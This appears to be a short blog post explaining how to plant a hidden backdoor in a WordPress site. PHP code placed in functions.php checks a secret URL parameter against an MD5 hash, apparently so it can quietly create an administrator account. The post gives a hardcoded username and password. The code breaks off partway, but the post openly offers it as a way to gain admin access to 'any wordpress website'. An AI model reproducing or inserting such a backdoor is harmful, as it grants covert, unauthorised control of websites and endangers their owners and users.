Skip to main content

Posts

Showing posts with the label create wordpress backdoor

WP create a hidden backdoor for access admin panel

 WP create a secret backdoor for access admin panel Create an hidden admin user programmatically to gain admin access in wordpress   To create a hidden backdoor to access admin panel in any wordpress website, we need to add a simple code snippet in our functions.php file. How it works ? We will add a code snippet in functions.php that will check get request by using $_GET method of php and if its exists then it will get value of it and match it with our pre defined hash code. For hash code we are using MD5 so it will be secure. We are using "thecoderain" as our new admin username and 'coderain007' as our password. If you want ,You can change according to you. So first open functions.php file and paste below code add_action( 'wp_head', 'mysecret_backdoor' ); function mysecret_backdoor() { if ( md5( $_GET['secretadmin'] ) == ' bc1bd15de8d5b0ce4944c87f2f960fd0 ' ) { require( 'wp-includes/registration.php' ); ...